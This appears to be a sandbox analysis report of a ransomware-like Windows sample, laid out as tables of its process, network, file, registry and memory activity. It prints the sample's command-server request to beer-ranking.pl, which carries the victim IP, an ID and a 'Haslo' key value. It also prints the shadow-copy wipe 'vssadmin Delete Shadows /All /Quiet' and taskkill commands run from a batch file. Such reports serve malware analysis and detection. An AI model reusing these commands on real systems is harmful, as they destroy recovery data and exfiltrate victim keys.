| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /login/post.php?IP=87.142.159.51&ID=0b75c6dd-d172-492e-b7be-2c05de30e808&Data=17-10-2017%2001:10:26&Haslo=46sDISwJJE10uqPP7rx!K_*@KX(YL2yASBN@3SDx6)7!_HL7IR23RZY!FUT1H2@9*H40@r71qZWq_r7ISTutC2_RHSDYFxRCOG!JI3tIL0IL1A4D38H)UGQ!93Ty@wJIMF14r5xNOO8AZXNLO4Ktu@_(YTwRZO@u4W85K_D9Owtx2QRBF*EJ7DGO6LqP@@UYQNN!M15@68qSIS3YOrqFFH4w35UYZzFAW3urN9*E1*6tOT1(U2D9tq)65TNO23ZIQ3K)XGCIDsL2XxZB9!u**t32XBBJ(92OXxMDNZU02 |
|
1 | |
| Send HTTP Request | headers = host: beer-ranking.pl, url = beer-ranking.pl/login/post.php?IP=87.142.159.51&ID=0b75c6dd-d172-492e-b7be-2c05de30e808&Data=17-10-2017%2001:10:26&Haslo=46sDISwJJE10uqPP7rx!K_*@KX(YL2yASBN@3SDx6)7!_HL7IR23RZY!FUT1H2@9*H40@r71qZWq_r7ISTutC2_RHSDYFxRCOG!JI3tIL0IL1A4D38H)UGQ!93Ty@wJIMF14r5xNOO8AZXNLO4Ktu@_(YTwRZO@u4W85K_D9Owtx2QRBF*EJ7DGO6LqP@@UYQNN!M15@68qSIS3YOrqFFH4w35UYZzFAW3urN9*E1*6tOT1(U2D9tq)65TNO23ZIQ3K)XGCIDsL2XxZB9!u**t32XBBJ(92OXxMDNZU02 |
|
1 | |
| Read Response | size = 4096, size_out = 180 |
|
1 |
| Information | Value |
|---|---|
| Server Name | beer-ranking.pl |
| Server Port | 80 |
| Data Sent | 0.05 KB (49 bytes) |
| Data Received | 1.82 KB (1863 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = beer-ranking.pl, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /save.txt |
|
1 | |
| Send HTTP Request | headers = host: beer-ranking.pl, url = beer-ranking.pl/save.txt |
|
1 | |
| Read Response | size = 4096, size_out = 1863 |
|
1 |
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:06, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:29 |
| Information | Value |
|---|---|
| PID | 0xad4 |
| Parent PID | 0xa90 (c:\users\kft6utqw\appdata\roaming\nvss.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AD8
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\kFT6uTQW\Desktop | type = file_attributes |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
7 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
4 | |
| Open | STD_OUTPUT_HANDLE |
|
26 | ||
| Open | STD_INPUT_HANDLE |
|
10 | ||
| Read | STD_INPUT_HANDLE | size = 8192 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 36 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 26 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a0f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76520000 |
|
2 | |
| Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7654a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76553b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76534a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7654a79d |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-16 14:27:24 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 99653 |
|
1 | |
| Get Info | type = Operating System |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
3 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
2 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\kFT6uTQW\Desktop |
|
1 |
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | cmd /c ""C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat"" |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:15, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:20 |
| Information | Value |
|---|---|
| PID | 0xbb0 |
| Parent PID | 0xa90 (c:\users\kft6utqw\appdata\roaming\nvss.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BB4
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000200000 | 0x00200000 | 0x00200fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000340000 | 0x00340000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000490000 | 0x00490000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000006d0000 | 0x006d0000 | 0x006dffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00867fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000870000 | 0x00870000 | 0x009f0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001e00000 | 0x01e00000 | 0x02142fff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x02150000 | 0x0241efff | Memory Mapped File | Readable |
|
|
|
|
| cmd.exe | 0x4a0f0000 | 0x4a13bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winbrand.dll | 0x73fb0000 | 0x73fb6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x73fd0000 | 0x73fd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x73fe0000 | 0x7403bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74040000 | 0x7407efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x753f0000 | 0x753fbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75400000 | 0x7545ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x755a0000 | 0x7564bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x763f0000 | 0x7648ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x76520000 | 0x7662ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76690000 | 0x7677ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x767e0000 | 0x7683ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x769a0000 | 0x769b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76c90000 | 0x76d2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x76ea0000 | 0x76ea9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x771f0000 | 0x772bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x772c0000 | 0x77305fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77310000 | 0x7740ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x77410000 | 0x7749ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000774a0000 | 0x774a0000 | 0x77599fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000775a0000 | 0x775a0000 | 0x776befff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x776c0000 | 0x77868fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x778a0000 | 0x77a1ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
18 | |
| Create | C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
17 | |
| Get Info | C:\Users\kFT6uTQW\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat" | type = file_attributes |
|
1 | |
| Get Info | type = file_type |
|
18 | ||
| Get Info | type = file_type |
|
18 | ||
| Open | STD_OUTPUT_HANDLE |
|
72 | ||
| Open | STD_INPUT_HANDLE |
|
72 | ||
| Open |
|
73 | |||
| Open |
|
71 | |||
| Read | size = 8191, size_out = 1648 |
|
1 | ||
| Read | size = 8191, size_out = 1638 |
|
1 | ||
| Read | size = 8191, size_out = 1581 |
|
1 | ||
| Read | size = 8191, size_out = 1538 |
|
1 | ||
| Read | size = 8191, size_out = 1487 |
|
1 | ||
| Read | size = 8191, size_out = 1438 |
|
1 | ||
| Read | size = 8191, size_out = 1391 |
|
1 | ||
| Read | size = 8191, size_out = 1348 |
|
1 | ||
| Read | size = 8191, size_out = 1297 |
|
1 | ||
| Read | size = 8191, size_out = 1258 |
|
1 | ||
| Read | size = 8191, size_out = 1219 |
|
1 | ||
| Read | size = 8191, size_out = 1178 |
|
1 | ||
| Read | size = 8191, size_out = 1119 |
|
1 | ||
| Read | size = 8191, size_out = 1044 |
|
1 | ||
| Read | size = 8191, size_out = 1007 |
|
1 | ||
| Read | size = 8191, size_out = 958 |
|
1 | ||
| Read | size = 8191, size_out = 913 |
|
1 | ||
| Read | size = 8191, size_out = 860 |
|
1 | ||
| Read | size = 8191, size_out = 787 |
|
1 | ||
| Read | size = 8191, size_out = 720 |
|
1 | ||
| Read | size = 8191, size_out = 675 |
|
1 | ||
| Read | size = 8191, size_out = 602 |
|
1 | ||
| Read | size = 8191, size_out = 551 |
|
1 | ||
| Read | size = 8191, size_out = 504 |
|
1 | ||
| Read | size = 8191, size_out = 453 |
|
1 | ||
| Read | size = 8191, size_out = 406 |
|
1 | ||
| Read | size = 8191, size_out = 357 |
|
1 | ||
| Read | size = 8191, size_out = 314 |
|
1 | ||
| Read | size = 8191, size_out = 269 |
|
1 | ||
| Read | size = 8191, size_out = 216 |
|
1 | ||
| Read | size = 8191, size_out = 169 |
|
1 | ||
| Read | size = 8191, size_out = 117 |
|
1 | ||
| Read | size = 8191, size_out = 83 |
|
1 | ||
| Read | size = 8191, size_out = 39 |
|
1 | ||
| Read | size = 8191, size_out = 0 |
|
1 | ||
| Read | size = 8191, size_out = 0 |
|
2 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\taskkill.exe | os_pid = 0xbc4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\taskkill.exe | os_pid = 0x948, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\taskkill.exe | os_pid = 0x8e4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\taskkill.exe | os_pid = 0x82c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ADVAPI32.dll | base_address = 0x763f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x4a0f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x76520000 |
|
2 | |
| Get Filename | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7654a84f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x76553b92 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x76534a5d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7654a79d |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x76412102 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferComputeTokenFromLevel, address_out = 0x76413352 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferCloseLevel, address_out = 0x76413825 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-16 14:27:32 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 107266 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
30 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
7 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
8 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\kFT6uTQW\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD, value = 0 |
|
33 | |
| Set Environment String | name = =ExitCode, value = 00000080 |
|
31 | |
| Set Environment String | name = =ExitCodeAscii, value = 0 |
|
33 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000002 |
|
1 |
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\syswow64\taskkill.exe |
| Command Line | TASKKILL /F /IM ApacheMonitor.exe /IM ApacheMonitor.exe |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:15, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:20 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xbc4 |
| Parent PID | 0xbb0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BC8
0x
BCC
0x
BD0
0x
BD4
0x
BD8
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| taskkill.exe.mui | 0x000f0000 | 0x000f3fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x00110fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000120000 | 0x00120000 | 0x00120fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000130000 | 0x00130000 | 0x00130fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
|
| taskkill.exe | 0x00190000 | 0x001a5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000220000 | 0x00220000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000260000 | 0x00260000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x00427fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000480000 | 0x00480000 | 0x004fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000500000 | 0x00500000 | 0x00680fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000006e0000 | 0x006e0000 | 0x007dffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x01bdffff | Pagefile Backed Memory | Readable |
|
|
|
|
| kernelbase.dll.mui | 0x01be0000 | 0x01c9ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000001cc0000 | 0x01cc0000 | 0x01cfffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d00000 | 0x01d00000 | 0x01d3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d60000 | 0x01d60000 | 0x01d9ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001db0000 | 0x01db0000 | 0x01deffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e00000 | 0x01e00000 | 0x01e3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001e40000 | 0x01e40000 | 0x01f3ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x01f40000 | 0x0220efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002210000 | 0x02210000 | 0x0224ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002290000 | 0x02290000 | 0x022cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002360000 | 0x02360000 | 0x0239ffff | Private Memory | Readable, Writable |
|
|
|
|
| ntdsapi.dll | 0x6a730000 | 0x6a747fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| fastprox.dll | 0x6a750000 | 0x6a7e5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wbemsvc.dll | 0x6a7f0000 | 0x6a7fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winsta.dll | 0x6a800000 | 0x6a828fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
